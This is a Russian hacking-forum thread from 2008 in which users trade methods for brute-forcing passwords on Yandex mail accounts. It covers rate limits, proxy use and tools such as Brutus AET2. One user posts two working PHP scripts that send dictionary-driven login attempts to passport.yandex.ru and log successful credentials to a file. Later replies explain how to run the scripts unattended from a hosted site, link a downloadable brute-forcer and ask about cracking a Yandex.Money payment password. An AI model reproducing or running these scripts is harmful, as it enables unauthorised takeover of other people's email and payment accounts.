Брут Яндекса

Discussion in 'Уязвимости Mail-сервисов' started by diehard, 20 Mar 2008.

  1. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Подскажите актуален ли сейчас брут почты @yandex.ru? Какие там ограничения? Банят?
     
    1 person likes this.
  2. Sated

    Sated Member

    Joined:
    12 Jan 2008
    Messages:
    0
    Likes Received:
    16
    Reputations:
    2
    юзай брут от Whack`a
     
  3. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    попробуй сам вручную перебрать 5 паролей, а потом задавай глупые вопросы, через pop3 банят после 300 попыток
     
  4. Pernat1y

    Pernat1y Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    479
    Likes Received:
    79
    Reputations:
    7
    да, банят быстро и на долго.
    или запасайся пачкой прокси, или забей...
     
  5. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    да актуален

    если хочеш заюзай мой скрипт (нужны сокеты)

    для брута одного логина несколькими паролями
    PHP:

    <?php
    $login
    ="логинжертвы"

    $passfile "pass.txt"
    for (
    $doscriot=0;$doscriot<=count($contents);$doscriot++) 
    {
    $passfile "pass.txt";

    $handle fopen($passfile,"r");
    $contents fread($handle,filesize($passfile));
    fclose($handle);
    $contents explode("\n",$contents);
    $parol=trim($contents[$doscriot]);


    $hostname "passport.yandex.ru"
    $path "/passport"
    $line "";


    $fp fsockopen($hostname80$errno$errstr30); 

    if (!
    $fp) echo "$errstr ($errno)<br />\n"
    else
    {

    $data "mode=auth&login=".$login."&passwd=".$parol."&retpath=http://mail.yandex.ru\r\n\r\n"

    $headers "POST $path HTTP/1.1\r\n"
    $headers .= "Host: $hostname\r\n";
    $headers .= "Content-type: application/x-www-form-urlencoded\r\n";
    $headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

    fwrite($fp$headers.$data); 
    while (!
    feof($fp)) 
    {
    $line .= fgets($fp1024);
    }
    fclose($fp);
    }

    if(
    $line[9]=="3")
    {

    $zergood 'good.txt';
    $somecontent " для логина ".$login." пароль ".$parol;


    if (
    is_writable($zergood)) {


        if (!
    $udacha fopen($zergood'a')) {
             echo 
    "Не могу открыть файл ($zergood)";
             exit;
        }


        if (
    fwrite($udacha$somecontent) === FALSE) {
            echo 
    "Не могу произвести запись в файл ($zergood)";
            exit;
        }
        
        echo 
    "Ура! сбручено ($somecontent) и записано в файл ($zergood)";
        
        
    fclose($udacha);

    } else {
        echo 
    "Файл $zergood недоступен для записи";
    }

    }

    }


    ?> 
    создаём ещё файлы good.txt куда запишется удачная комбинация

    и файл pass.txt со словарём для брута (список паролей)
    на все файлы права 777


    для брута одним паролем на несколько логинов
    PHP:
    <?php
    $parol
    ="пароль"

    $loginsfile "login.txt"
    for (
    $doscriot=0;$doscriot<=count($contents);$doscriot++) 
    {
    $loginsfile "login.txt";

    $handle fopen($loginsfile,"r");
    $contents fread($handle,filesize($loginsfile));
    fclose($handle);
    $contents explode("\n",$contents);
    $loginsss=trim($contents[$doscriot]);


    $hostname "passport.yandex.ru"
    $path "/passport"
    $line "";


    $fp fsockopen($hostname80$errno$errstr30); 

    if (!
    $fp) echo "$errstr ($errno)<br />\n"
    else
    {

    $data "mode=auth&login=".$loginsss."&passwd=".$parol."&retpath=http://mail.yandex.ru\r\n\r\n"

    $headers "POST $path HTTP/1.1\r\n"
    $headers .= "Host: $hostname\r\n";
    $headers .= "Content-type: application/x-www-form-urlencoded\r\n";
    $headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

    fwrite($fp$headers.$data); 
    while (!
    feof($fp)) 
    {
    $line .= fgets($fp1024);
    }
    fclose($fp);
    }

    if(
    $line[9]=="3")
    {

    $zergood 'good.txt';
    $somecontent " у  пароля ".$parol." логин ".$loginsss;


    if (
    is_writable($zergood)) {


        if (!
    $udacha fopen($zergood'a')) {
             echo 
    "Не могу открыть файл ($zergood)";
             exit;
        }


        if (
    fwrite($udacha$somecontent) === FALSE) {
            echo 
    "Не могу произвести запись в файл ($zergood)";
            exit;
        }
        
        echo 
    "Ура! сбручено ($somecontent) и записано в файл ($zergood)";
        
        
    fclose($udacha);

    } else {
        echo 
    "Файл $zergood недоступен для записи";
    }

    }

    }


    ?> 

    создаём ещё файлы good.txt куда запишется удачные комбинации

    и файл login.txt со словарём для брута (список логинов)
    на все файлы права 777
     
    2 people like this.
  6. URB-VOLK

    URB-VOLK Elder - Старейшина

    Joined:
    27 Jan 2008
    Messages:
    73
    Likes Received:
    13
    Reputations:
    -6
    Хороший скрипт)
     
  7. CRL

    CRL Active Member

    Joined:
    21 Oct 2006
    Messages:
    47
    Likes Received:
    102
    Reputations:
    12
    Хм. У меня в Брутусе скорость от 700pps на яндексе. Правда бан потом идет, но словарик 3000-5000 паролей отлично проходит. Меня кончно немного поражает скорость такая, но пароль все равно находится валидный.
     
    #7 CRL, 22 Mar 2008
    Last edited: 22 Mar 2008
    4 people like this.
  8. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    а главное что свой трафик тратить ненужно. залил на сайт запустил скрипт выключил комп лёг спать и твой домен всё за тебя сделает. а на завтро смотриш на сайте уже удачные комбинации. помоему рализация брутеров на пхп стоящее занятие
     
    1 person likes this.
  9. URB-VOLK

    URB-VOLK Elder - Старейшина

    Joined:
    27 Jan 2008
    Messages:
    73
    Likes Received:
    13
    Reputations:
    -6
    Надо будит испытать как ты сказал + тебе в репу)
     
  10. Timati

    Timati Banned

    Joined:
    17 Mar 2008
    Messages:
    4
    Likes Received:
    11
    Reputations:
    -10
    ТС , ДА актуалеен!
     
    5 people like this.
  11. Gordiy

    Gordiy Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    61
    Likes Received:
    2
    Reputations:
    0
    а мложно тупой вопрос? а скрипт куда вставлять? как я понял страница сохраняется в index.php а вот начало такого <html><body> тут скрипт php и потом идут закрывающие тэги! или не так???
     
  12. xaklip

    xaklip Elder - Старейшина

    Joined:
    5 Mar 2008
    Messages:
    84
    Likes Received:
    47
    Reputations:
    24
    Копируещ весь код из первого поста и сохраняеш в файлик index.php (создай текстовый документ и переименуй txt на php) :)

    И без всяких <html><body> и т.п.
     
  13. NetSter

    NetSter Moderator

    Joined:
    30 Jul 2007
    Messages:
    810
    Likes Received:
    414
    Reputations:
    62
    Zet36, респект за скрипт. +)
     
    _________________________
    1 person likes this.
  14. NetSter

    NetSter Moderator

    Joined:
    30 Jul 2007
    Messages:
    810
    Likes Received:
    414
    Reputations:
    62
    нашел у себя старый брютер для яндекса.

    [​IMG]

    скачать можно ЗДЕСЬ
    пас 123
     
    _________________________
  15. _eXe_

    _eXe_ Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    58
    Likes Received:
    8
    Reputations:
    -4
    А в чем проблема с использованием aet2 в связке с прокси?
     
  16. puyol

    puyol New Member

    Joined:
    8 Mar 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    если прокси есть конечно актуален
     
  17. XaCeRoC

    XaCeRoC Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    62
    Likes Received:
    23
    Reputations:
    -12
    скажите какой брут юзать если мне надо сбрутить платёжный пароль на _money.yandex.ru
     
  18. grandmasterbit

    grandmasterbit Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    59
    Likes Received:
    21
    Reputations:
    0
    NetSter а какой там pass?
     
  19. sasha008

    sasha008 Elder - Старейшина

    Joined:
    2 Apr 2008
    Messages:
    102
    Likes Received:
    49
    Reputations:
    -3
    рекомендую брутить яндекс brutus-aet2 очень хорошая прога!
     
  20. dscan

    dscan Elder - Старейшина

    Joined:
    23 Feb 2007
    Messages:
    265
    Likes Received:
    127
    Reputations:
    15
    уже на протяжении 5 последних лет :)